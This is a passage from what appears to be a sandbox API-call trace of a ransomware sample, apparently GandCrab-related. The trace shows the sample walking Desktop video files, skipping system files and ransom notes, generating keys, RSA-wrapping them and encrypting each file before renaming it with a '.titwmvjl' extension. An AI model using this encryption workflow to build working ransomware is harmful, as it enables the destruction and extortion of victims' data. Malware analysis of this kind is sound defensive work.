lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.335] lstrcmpW (lpString1="XPkX.mkv", lpString2=".") returned 1 [0089.335] lstrcmpW (lpString1="XPkX.mkv", lpString2="..") returned 1 [0089.335] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="XPkX.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv" [0089.335] lstrlenW (lpString=".titwmvjl") returned 9 [0089.335] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv") returned 38 [0089.335] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.336] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv.titwmvjl") returned 47 [0089.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv") returned 38 [0089.336] lstrlenW (lpString=".mkv") returned 4 [0089.336] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.336] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0089.336] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0089.336] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv") returned 38 [0089.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv") returned 38 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="desktop.ini") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="autorun.inf") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="ntuser.dat") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="iconcache.db") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="bootsect.bak") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="boot.ini") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="ntuser.dat.log") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="thumbs.db") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="ntldr") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="NTDETECT.COM") returned 1 [0089.336] lstrcmpiW (lpString1="XPkX.mkv", lpString2="Bootfont.bin") returned 1 [0089.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv") returned 38 [0089.336] lstrlenW (lpString=".mkv") returned 4 [0089.336] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.337] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0089.337] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.337] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xpkx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.337] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.337] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.338] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.338] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.339] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.339] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.340] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.340] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.340] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.340] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.340] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.341] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.341] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.342] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.342] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.342] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.342] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.342] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.343] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503738) returned 1 [0089.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.343] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.344] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.344] GetLastError () returned 0x0 [0089.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.344] CryptDestroyKey (hKey=0x503738) returned 1 [0089.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.344] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.344] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.346] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0089.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.346] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.346] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.346] GetLastError () returned 0x0 [0089.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.347] CryptDestroyKey (hKey=0x5038f8) returned 1 [0089.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.347] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.347] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.347] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.347] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xdf3, lpOverlapped=0x0) returned 1 [0089.352] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffff20d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.352] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdf3, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xdf3, lpOverlapped=0x0) returned 1 [0089.353] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.354] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.357] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.360] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.360] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.361] CloseHandle (hObject=0x2ac) returned 1 [0089.361] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xpkx.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\XPkX.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xpkx.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0089.362] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.362] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.362] lstrcmpW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2=".") returned 1 [0089.362] lstrcmpW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="..") returned 1 [0089.362] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="y2_-Obbq4hv4 Y.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv" [0089.362] lstrlenW (lpString=".titwmvjl") returned 9 [0089.362] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv") returned 48 [0089.362] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.362] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv.titwmvjl") returned 57 [0089.362] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv") returned 48 [0089.362] lstrlenW (lpString=".flv") returned 4 [0089.362] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.363] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0089.363] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0089.363] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.363] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv") returned 48 [0089.363] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv") returned 48 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="desktop.ini") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="autorun.inf") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="ntuser.dat") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="iconcache.db") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="bootsect.bak") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="boot.ini") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="ntuser.dat.log") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="thumbs.db") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="CRAB-DECRYPT.html") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="ntldr") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="NTDETECT.COM") returned 1 [0089.363] lstrcmpiW (lpString1="y2_-Obbq4hv4 Y.flv", lpString2="Bootfont.bin") returned 1 [0089.363] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv") returned 48 [0089.363] lstrlenW (lpString=".flv") returned 4 [0089.363] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.363] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0089.363] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.364] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.364] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\y2_-obbq4hv4 y.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.364] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.364] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.365] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.365] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.366] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.366] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.367] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.367] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.367] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.367] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.367] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.368] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.368] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.368] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.368] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.369] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.369] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.369] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.370] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.370] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0089.370] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.370] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.370] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.371] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.371] GetLastError () returned 0x0 [0089.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.371] CryptDestroyKey (hKey=0x5032f8) returned 1 [0089.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.371] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.371] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.373] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5031f8) returned 1 [0089.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.373] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.373] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.373] GetLastError () returned 0x0 [0089.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.373] CryptDestroyKey (hKey=0x5031f8) returned 1 [0089.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.374] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.374] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.374] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.374] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x13bd4, lpOverlapped=0x0) returned 1 [0089.381] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffec42c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.381] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13bd4, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x13bd4, lpOverlapped=0x0) returned 1 [0089.382] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.382] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.383] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.387] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.387] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.387] CloseHandle (hObject=0x2ac) returned 1 [0089.388] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\y2_-obbq4hv4 y.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\y2_-Obbq4hv4 Y.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\y2_-obbq4hv4 y.flv.titwmvjl"), dwFlags=0x1) returned 1 [0089.389] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.389] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.389] lstrcmpW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2=".") returned 1 [0089.389] lstrcmpW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="..") returned 1 [0089.389] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="YIZKTZac3L5eFR7x.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi" [0089.389] lstrlenW (lpString=".titwmvjl") returned 9 [0089.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi") returned 50 [0089.389] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.389] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi.titwmvjl") returned 59 [0089.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi") returned 50 [0089.389] lstrlenW (lpString=".avi") returned 4 [0089.389] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.389] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0089.389] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0089.389] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi") returned 50 [0089.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi") returned 50 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="desktop.ini") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="autorun.inf") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="ntuser.dat") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="iconcache.db") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="bootsect.bak") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="boot.ini") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="ntuser.dat.log") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="thumbs.db") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", 